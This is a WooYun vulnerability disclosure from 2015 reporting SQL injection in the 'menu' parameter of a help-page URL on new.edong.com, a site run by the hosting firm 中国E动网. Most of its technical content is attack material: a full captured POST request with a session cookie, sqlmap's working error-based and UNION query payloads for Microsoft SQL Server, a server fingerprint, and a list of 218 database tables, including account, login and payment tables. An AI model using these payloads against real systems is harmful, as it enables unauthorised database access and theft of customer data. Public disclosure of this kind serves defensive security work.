当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149749

漏洞标题:中国E动网某站存在SQL注入漏洞可UNION

相关厂商:中国E动网

漏洞作者: miracle

提交时间:2015-10-27 11:05

修复时间:2015-11-01 11:06

公开时间:2015-11-01 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /help/news/%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF/317.html?infoid=317&infoid=317&menu=LTE&menu=news&tmenu=%u884c%u4e1a%u8d44%u8baf&tmenu=%u884c%u4e1a%u8d44%u8baf HTTP/1.1
Content-Length: 9598
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://new.edong.com
Cookie: ASP.NET_SessionId=htmphjd20qqhkgenqv5cjw5h; temp_user=sessionkey=temp_kGZI9PCkmFl9fvNv
Host: new.edong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
__VIEWSTATE=/wEPDwULLTE2OTc2OTQ5NDUPZBYCZg9kFgICAw9kFgRmDxYCHglpbm5lcmh0bWwFpAM8bGk%2bPGEgaHJlZj0iaHR0cDovL25ldy5lZG9uZy5jb20vIj7pppbpobU8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iL2hlbHAvd2VudGkvIj7luLjop4Hpl67popg8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iL2hlbHAvbmV3cy8iPuaWsOmXu%2bS4reW/gzwvYT48L2xpPjxsaT48YSBocmVmPSIvaGVscC9iZWlhbi8iPuWkh%2bahiDwvYT48L2xpPjxsaT48YSBocmVmPSIvaGVscC9kb3dubG9hZC8iPui1hOaWmeS4i%2bi9vTwvYT48L2xpPjxsaT48YSBocmVmPSIvaGVscC9hYm91dC8iPuWFs%2bS6juaIkeS7rDwvYT48L2xpPjxsaT48YSBocmVmPSIvaGVscC9lZG9uZ3l1bi8iPuaYk%2bWKqOS6keW4ruWKqeS4reW/gzwvYT48L2xpPjxsaT48YSBocmVmPSIvaGVscC/mmJPliqjkupHmlrDpl7vlhazlkYovIj7mmJPliqjkupHmlrDpl7vlhazlkYo8L2E%2bPC9saT5kAgEPZBYGAgEPFgIfAGVkAgMPFgIfAAUsReWKqOaWsOW5s%2bWPsOS4iue6vyDmm7TliqDms6jph43nlKjmiLfkvZPpqoxkAgUPFgIfAAX1MTxwPiYjMTYwOyA8L3A%2bCjxwIGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJ0ZXh0LWluZGVudDogMjFwdDsgbXNvLWNoYXItaW5kZW50LWNvdW50OiAyLjAiPjxzcGFuIHN0eWxlPSJmb250LWZhbWlseTog5a6L5L2TOyBtc28tYXNjaWktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTs7IG1zby1oYW5zaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OyI%2b5LiK5rW35qyn572R572R57uc56eR5oqA5Y%2bR5bGV5pyJ6ZmQ5YWs5Y%2b45peX5LiLPC9zcGFuPjxzcGFuIGxhbmc9IkVOLVVTIj7igJw8L3NwYW4%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7kuK3lm708L3NwYW4%2bPHNwYW4gbGFuZz0iRU4tVVMiPkU8L3NwYW4%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7liqjnvZE8L3NwYW4%2bPHNwYW4gbGFuZz0iRU4tVVMiPuKAnTwvc3Bhbj48c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IOWui%2bS9kzsgbXNvLWFzY2lpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7OyBtc28taGFuc2ktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTsiPuaWsOW5s%2bWPsOS7iuaXpeato%2bW8j%2bS4iue6v%2bOAguaWsOW5s%2bWPsOS7juWkluinguS4iuOAgeWKn%2biDveS4iuS7peWPiuW6leWxguaVsOaNrue7k%2baehOS4iumDveWBmuS6huWFqOmdoueahOS8mOWMluWSjOWNh%2be6p%2b%2b8jOWwhuS4uuW5v%2bWkp%2beUqOaIt%2baPkOS%2bm%2babtOS4sOWvjOOAgeabtOS4k%2bS4muOAgeabtOWujOWWhOeahOacjeWKoeOAgjwvc3Bhbj48c3BhbiBsYW5nPSJFTi1VUyI%2bPG86cD4mIzE2MDs8L286cD48L3NwYW4%2bCjwvcD4KPHAgY2xhc3M9Ik1zb05vcm1hbCIgc3R5bGU9InRleHQtaW5kZW50OiAyMXB0OyBtc28tY2hhci1pbmRlbnQtY291bnQ6IDIuMCI%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7mlrDlubPlj7Dkuqflk4HlvIDlj5HkurrlkZjku4vnu43vvIzmlrDlubPlj7DmmK/lnKjljp/mnInml6flubPlj7DnmoTln7rnoYDkuIrvvIzlr7nml6flubPlj7DnmoTlip/og73ov5vooYzkuobmlLnov5vlkozliqDlvLrvvIzlubblop7mt7vkuobpg6jliIbmlrDnmoTmqKHlnZfvvIzku47ogIzmm7Tlpb3nmoTmnI3liqHlhbfmnInkuI3lkIzpnIDmsYLnmoTnlKjmiLfjgII8L3NwYW4%2bPHNwYW4gbGFuZz0iRU4tVVMiPiA8L3NwYW4%2bCjwvcD4KPHAgY2xhc3M9Ik1zb05vcm1hbCI%2bPHNwYW4gbGFuZz0iRU4tVVMiPjxvOnA%2bPC9vOnA%2bPC9zcGFuPgo8L3A%2bCjxwIGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJ0ZXh0LWluZGVudDogMjFwdDsgbXNvLWNoYXItaW5kZW50LWNvdW50OiAyLjAiPjxzcGFuIHN0eWxlPSJmb250LWZhbWlseTog5a6L5L2TOyBtc28tYXNjaWktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTs7IG1zby1oYW5zaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OyI%2b5o2u5LqG6Kej77yM5paw5bmz5Y%2bw5pyA5aSn55qE5Lqu54K55bCx5piv5pu05Yqg5YWz5rOoPC9zcGFuPjxzcGFuIHN0eWxlPSJiYWNrZ3JvdW5kOiB3aGl0ZTsgY29sb3I6IGJsYWNrOyBmb250LWZhbWlseTog5a6L5L2TIj7nlKjmiLfkvZPpqozjgILkuI3ku4Xph43ngrnnqoHlh7rkuobluK7liqnkuK3lv4Pov5nkuIDmqKHlnZfvvIzku6Xmm7Tlpb3nmoTluK7liqnnlKjmiLfop6PlhrPkuqflk4HotK3kubDlkozkvb/nlKjnrYnmlrnpnaLnmoTpl67popjjgILmm7TlhYXliIblkKzlj5bkuobnlKjmiLfnmoTlo7Dpn7PvvIzmjqjlh7rkuobmnInpl67lv4XnrZTmnb/lnZfvvIznlKjmiLflhbPkuo7kuqflk4HmnI3liqHmiJbmioDmnK/mlrnpnaLnmoTpl67popjpg73lj6/ku6Xlj4rml7bojrflvpfop6PnrZTvvIznnJ/mraPkv53pmpznlKjmiLfnmoTmnYPnm4rjgII8c3BhbiBsYW5nPSJFTi1VUyI%2bPG86cD48L286cD48L3NwYW4%2bPC9zcGFuPgo8L3A%2bCjxwIGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJ0ZXh0LWluZGVudDogMjFwdDsgbXNvLWNoYXItaW5kZW50LWNvdW50OiAyLjAiPjxzcGFuIGxhbmc9IkVOLVVTIiBzdHlsZT0iYmFja2dyb3VuZDogd2hpdGU7IGNvbG9yOiBibGFjazsgZm9udC1mYW1pbHk6IOWui%2bS9kyI%2bPG86cD48L286cD48L3NwYW4%2bCjwvcD4KPHAgY2xhc3M9Ik1zb05vcm1hbCIgc3R5bGU9InRleHQtaW5kZW50OiAyMXB0OyBtc28tY2hhci1pbmRlbnQtY291bnQ6IDIuMCI%2bPHNwYW4gc3R5bGU9ImJhY2tncm91bmQ6IHdoaXRlOyBjb2xvcjogYmxhY2s7IGZvbnQtZmFtaWx5OiDlrovkvZMiPuatpOWkluaWsOW5s%2bWPsOeahOeos%2bWumuaAp%2bWSjOmAn%2bW6puS5n%2bW%2bl%2bWIsOS6huaegeWkp%2baPkOWNh%2b%2b8jOmhtemdouiuvuiuoeabtOWKoOeugOa0ge%2b8jOabtOWKoOi0tOWQiOeUqOaIt%2beahOS9v%2beUqOS5oOaDr%2bOAguWcqOeUqOaIt%2bazqOWGjOOAgeWQjuWPsOeuoeeQhuetieaWuemdouS5n%2bi/m%2bihjOS6huW%2biOWkmuWunueUqOeahOWNh%2be6p%2bOAguWPr%2bS7peivtO%2b8jDxzcGFuIGxhbmc9IkVOLVVTIj5FPC9zcGFuPuWKqOe9keaWsOW5s%2bWPsOebuOWvueS6juaXp%2bW5s%2bWPsOadpeivtOaYr%2bS4gOasoeW3qOWkp%2beahOmjnui3g%2b%2b8jOebuOS/oeS8mue7meeUqOaIt%2bW4puadpeS4jeS4gOagt%2beahOS9v%2beUqOaEn%2bWPl%2bOAgjxzcGFuIGxhbmc9IkVOLVVTIj48bzpwPjwvbzpwPjwvc3Bhbj48L3NwYW4%2bCjwvcD4KPHAgY2xhc3M9Ik1zb05vcm1hbCIgc3R5bGU9InRleHQtaW5kZW50OiAyMXB0OyBtc28tY2hhci1pbmRlbnQtY291bnQ6IDIuMCI%2bPHNwYW4gbGFuZz0iRU4tVVMiIHN0eWxlPSJiYWNrZ3JvdW5kOiB3aGl0ZTsgY29sb3I6IGJsYWNrOyBmb250LWZhbWlseTog5a6L5L2TIj48bzpwPjwvbzpwPjwvc3Bhbj4KPC9wPgo8cCBjbGFzcz0iTXNvTm9ybWFsIiBzdHlsZT0idGV4dC1pbmRlbnQ6IDIxcHQ7IG1zby1jaGFyLWluZGVudC1jb3VudDogMi4wIj48c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IOWui%2bS9kzsgbXNvLWFzY2lpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7OyBtc28taGFuc2ktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTsiPuaNruS7i%2be7je%2b8jOacrOasoTwvc3Bhbj48c3BhbiBsYW5nPSJFTi1VUyI%2bRTwvc3Bhbj48c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IOWui%2bS9kzsgbXNvLWFzY2lpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7OyBtc28taGFuc2ktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTsiPuWKqOaWsOW5s%2bWPsOS4iue6v%2bWFrOa1i%2bWQju%2b8jOWOn%2baciTwvc3Bhbj48c3BhbiBsYW5nPSJFTi1VUyI%2bRTwvc3Bhbj48c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IOWui%2bS9kzsgbXNvLWFzY2lpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7OyBtc28taGFuc2ktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTsiPuWKqOW5s%2bWPsOWwhuacieS4uuacn%2bS4ieS4quaciOeahOaUtuWwvuaXtumXtO%2b8jOmihOiuoeWwhuS8muS6jjwvc3Bhbj48c3BhbiBsYW5nPSJFTi1VUyI%2bOTwvc3Bhbj48c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IOWui%2bS9kzsgbXNvLWFzY2lpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7OyBtc28taGFuc2ktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTsiPuaciOW6leWFs%2bmXreOAguWOn%2bacieeahOeUqOaIt%2bi1hOaWmeWwhumAkOatpei9rOenu%2bWIsOaWsOW5s%2bWPsO%2b8jOi0puaIt%2bi1hOmHkeWPiueUqOaIt%2bS/oeaBr%2betieS4jeS8muacieS7u%2bS9leW9seWTjeOAgjwvc3Bhbj4KPC9wPgo8cCBjbGFzcz0iTXNvTm9ybWFsIiBzdHlsZT0idGV4dC1pbmRlbnQ6IDIxcHQ7IG1zby1jaGFyLWluZGVudC1jb3VudDogMi4wIj48c3BhbiBsYW5nPSJFTi1VUyI%2bPG86cD48L286cD48L3NwYW4%2bCjwvcD4KPHAgY2xhc3M9Ik1zb05vcm1hbCIgc3R5bGU9InRleHQtaW5kZW50OiAyMXB0OyBtc28tY2hhci1pbmRlbnQtY291bnQ6IDIuMCI%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7lgLzlvpfms6jmhI/nmoTmmK/vvIzmlrDlubPlj7Dov5jku7/nhafotK3niannvZHnq5nov5DooYzmqKHlvI/mlrDmt7vliqDkuobotK3nianovabov5nkuIDlip/og73jgILnlKjmiLflj6/lsIbpnIDopoHotK3kubDnmoTkuqflk4HmlL7lhaXotK3nianovablhoXnu5/kuIDnu5PnrpfvvIzkuI3lho3lg4/ku6XliY3kuIDmoLfpnIDopoHkuIDku7bku7bnmoTov5vooYzotK3kubDjgII8L3NwYW4%2bCjwvcD4KPHAgY2xhc3M9Ik1zb05vcm1hbCI%2bPHNwYW4gbGFuZz0iRU4tVVMiPjxvOnA%2bPC9vOnA%2bPC9zcGFuPgo8L3A%2bCjxwIGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJ0ZXh0LWluZGVudDogMjFwdDsgbXNvLWNoYXItaW5kZW50LWNvdW50OiAyLjAiPjxzcGFuIHN0eWxlPSJmb250LWZhbWlseTog5a6L5L2TOyBtc28tYXNjaWktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTs7IG1zby1oYW5zaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OyI%2b5LiK5rW35qyn572R572R57uc56eR5oqA5Y%2bR5bGV5pyJ6ZmQ5YWs5Y%2b45oiQ56uL5LqOPC9zcGFuPjxzcGFuIGxhbmc9IkVOLVVTIj4yMDAzPC9zcGFuPjxzcGFuIHN0eWxlPSJmb250LWZhbWlseTog5a6L5L2TOyBtc28tYXNjaWktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTs7IG1zby1oYW5zaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OyI%2b5bm044CC5piv6Ie05Yqb5LqO5Li655So5oi35o%2bQ5L6b5LiT5Lia55qEPC9zcGFuPjxzcGFuIGxhbmc9IkVOLVVTIj5JREM8L3NwYW4%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7mjqXlhaXmnI3liqHnmoTpq5jmlrDmioDmnK/kvIHkuJrjgILmraTmrKHnmoTmlrDlubPlj7DljYfnuqfvvIzkuI3mmK/nroDljZXnmoTnvZHnq5nlubPlj7DnmoTmm7TmjaLvvIzogIzmmK/mnI3liqHnkIblv7XnrYnlpJrpoobln5/nmoTovazlj5jjgILkuK3lm708L3NwYW4%2bPHNwYW4gbGFuZz0iRU4tVVMiPkU8L3NwYW4%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7liqjnvZHmt7HliLvliIbmnpDkuobkuK3lm73lvZPliY3kupLogZTnvZHlj5HlsZXnmoTlrp7pmYXmg4XlhrXvvIznu5PlkIjoh6rouqvmioDmnK/kvJjlir/vvIzkuI3mlq3mjqLntKLosIPmn6XlkozliJvmlrDlu7rnq4vlhbfmnIk8L3NwYW4%2bPHNwYW4gbGFuZz0iRU4tVVMiPkU8L3NwYW4%2bPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OiDlrovkvZM7IG1zby1hc2NpaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OzsgbXNvLWhhbnNpLWZvbnQtZmFtaWx5OiAmIzM5O3RpbWVzIG5ldyByb21hbiYjMzk7Ij7liqjnvZHnibnoibLnmoTnu4/okKXmqKHlvI/jgILnm7jkv6HlhajmlrDnmoTnvZHnq5nlpJbop4Llj4rmqKHlnZflronmjpLjgIHlhajpnaLlkIjnkIbnmoTlip/og73orr7orqHvvIzlsIblkYjnjrDnu5nnlKjmiLfkuIDkuKrmm7TlrozlloTnmoTnvZHnq5nlubPlj7DvvIw8L3NwYW4%2bIDxzcGFuIHN0eWxlPSJmb250LWZhbWlseTog5a6L5L2TOyBtc28tYXNjaWktZm9udC1mYW1pbHk6ICYjMzk7dGltZXMgbmV3IHJvbWFuJiMzOTs7IG1zby1oYW5zaS1mb250LWZhbWlseTogJiMzOTt0aW1lcyBuZXcgcm9tYW4mIzM5OyI%2b56Gu5L%2bd55So5oi35aeL57uI5Lqr5Y%2bX5Yiw6auY6LSo6YeP44CB5LiT5Lia5YyW55qE5pyN5Yqh44CCPC9zcGFuPgo8L3A%2bZGSia9W5bgRwtmwX8AmLg6ZlQJlEmSmlKkKKcar9s00TJg%3d%3d

注入点:menu参数

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: menu (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: infoid=317&infoid=317&menu=LTE&menu=news' AND 4780=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4780=4780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'weaU'='weaU&tmenu=%u884c%u4e1a%u8d44%u8baf&tmenu=%u884c%u4e1a%u8d44%u8baf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: infoid=317&infoid=317&menu=LTE&menu=news' UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(80)+CHAR(112)+CHAR(112)+CHAR(106)+CHAR(97)+CHAR(117)+CHAR(113)+CHAR(86)+CHAR(85)+CHAR(119)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL-- &tmenu=%u884c%u4e1a%u8d44%u8baf&tmenu=%u884c%u4e1a%u8d44%u8baf
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: biz
[218 tables]
+----------------------------------------+
| AccountDPIList |
| Account_Account_Level_View |
| Account_info |
| Answer_View |
| Biz_Account_Agent |
| Biz_Account_Agent |
| Biz_Account_financial |
| Biz_Invoice |
| Biz_InvoiceTemplate |
| Biz_Mail_Type |
| Biz_Server_Type_Para |
| Biz_ShoppingCart_Para |
| Biz_ShoppingCart_Para |
| Biz_Vhost_Web_ISAPI |
| Biz_Vhost_Web_ISAPI |
| Biz_Vhost_Web_Mime |
| Contact_Default |
| ControlTobizOrderpara |
| DomainTempleteList |
| Domain_Out_Contacts |
| DomainsChangeAccount_View |
| Domains_Para_View |
| Domains_Redemption_View |
| Domains_Register_View |
| Domains_Trans_In_View |
| Domains_Trans_Out_View |
| GetDomainsDNS |
| GetDomains_productClass |
| GetProductClassName |
| Group_Group_Sub_SeverInfo_View |
| HelpModuleAndInfo_View |
| HostChangeAccount_View |
| HostList_View |
| Host_Ftp_Domains_View |
| Host_Open_Account_Level_View |
| Host_Open_View |
| Industry_select_Control |
| InvoiceAccountList_View2 |
| MailProduct_View |
| OnlinePaymentList_View |
| OrderDetailInfo |
| OrderList |
| OrderOperation_View |
| Print_Order |
| ProductPrice_Account_Level_View |
| Product_ProductClass_View |
| Product_SalesScope_Account_Level_View |
| QuestionForBusiness_View |
| Question_View |
| ServerInfo_Server_Para_View |
| Sys_IpRange |
| Task_Host_UpZip_Log_View |
| Template |
| VirtualHostList_View |
| VirtualHost_Product_Hsot_Relation_View |
| bizProductClass |
| bizProduct_SalesScope |
| bizProduct_Spec |
| biz_AccountLevel_Relation |
| biz_Account_ConsumerRecords |
| biz_Account_DPI |
| biz_Account_Email |
| biz_Account_Login |
| biz_Account_MailInform |
| biz_Account_MailInform |
| biz_Account_Message |
| biz_Account_NewsNotice |
| biz_Account_SMS |
| biz_Account_invoice |
| biz_Account_level |
| biz_Account_supplement |
| biz_Answer |
| biz_BackGround |
| biz_Billing_Template |
| biz_BreakDown |
| biz_DNS_Line |
| biz_DNS_Line |
| biz_DNS_Log |
| biz_DNS_Sub |
| biz_DepartMent |
| biz_Domain_Out_Contacts |
| biz_DomainsParas |
| biz_Domains_DNS |
| biz_Group_Sub |
| biz_Group_Sub |
| biz_Hardware |
| biz_Host_Language |
| biz_Host_LineType |
| biz_Host_Open_Maintain |
| biz_Host_Open_Maintain |
| biz_Host_Open_Para |
| biz_Host_Type |
| biz_IDCIP |
| biz_IDCServer |
| biz_IDCServerSpec |
| biz_IDCService_Operation |
| biz_IDCVLAN |
| biz_IDC_Cabinet |
| biz_IDC_PortAndBroad |
| biz_IDC_Relation_CabinetToPort |
| biz_IDC_Relation_PortToVLan |
| biz_Line_Type |
| biz_Mail_Product |
| biz_OnlinePayment |
| biz_Product_Host_Type |
| biz_Product_Host_Type |
| biz_Product_Hsot_Relation |
| biz_Product_Promo |
| biz_ProoductToMemberLevel |
| biz_QuestionForBusiness |
| biz_QuestionForBusiness |
| biz_QuestionForProduct |
| biz_QuestionLog |
| biz_RelationQuestionToDepart |
| biz_RelationVHostToIP |
| biz_Relation_HostToDomain |
| biz_Relation_Order_Sales |
| biz_Server_Connection |
| biz_Server_IP |
| biz_Server_Info |
| biz_Server_Para |
| biz_Task_Host_UpZip_Log |
| biz_Task_Host_UpZip_Log |
| biz_Task_Host_UpZip_Log |
| biz_VHostToService |
| biz_VHost_FTP |
| biz_Vhost_DB |
| biz_Vhost_Mail_Detail |
| biz_Vhost_Mail_Detail |
| biz_Vhost_Web_Para |
| biz_VirtualHost |
| biz_domain_log |
| biz_domains_Redemption |
| biz_domains_change_account |
| biz_domains_change_account |
| biz_domains_change_param |
| biz_domains_change_register |
| biz_domains_para |
| biz_domains_register |
| biz_domains_trans_in |
| biz_domains_trans_out |
| biz_host_change_account |
| biz_idcrooms |
| biz_job_description |
| biz_order_operation |
| biz_order_operation |
| biz_order_para |
| biz_order_sub |
| biz_productPrice_change |
| biz_productPrice_change |
| biz_product_interface |
| biz_product_tactics_open |
| biz_product_tactics_open |
| biz_productpackages_detail |
| biz_productpackages_detail |
| biz_productprice_off |
| biz_transcation_para |
| biz_transcation_para |
| biz_work_order |
| domain_para_sub |
| domain_register_info |
| financialControl_ClassName |
| financialControl_ClassName |
| help_Info |
| help_MainMenu |
| help_ModuleAndInfo |
| help_ModuleAndInfo |
| help_SecondaryMenu |
| help_ThreeMenu |
| help_View |
| job_select_Control |
| log_InOut |
| log_operatiom |
| log_sys |
| newsinfo |
| questionLog_view |
| relation_ordertoInvoice |
| rolefun |
| roles |
| s_Account |
| s_AccountToRole |
| s_Buttons |
| s_Menus |
| s_Permission |
| s_Role |
| select_Control |
| sys_Account_mantainance |
| sys_Account_mantainance |
| sys_Area_1 |
| sys_Area_1 |
| sys_Button |
| sys_City |
| sys_Country |
| sys_Favorite |
| sys_IP_Property |
| sys_Menus |
| sys_Privilege |
| sys_Province |
| sys_control |
| sys_dept |
| sys_domain_interface |
| sys_duty |
| sys_info_from |
| sys_interface_domain |
| sys_para |
| sys_purview |
| sys_role |
| sys_roletopurview |
| sys_supplement_interface |
| sys_tactics_price |
| sys_tatics_open |
| sys_user |
| sys_userrole |
| sysdiagrams |
| t_log_dns |
| userfun |
| userinfo |
| v_user |
+----------------------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 miracle@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-01 11:06

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无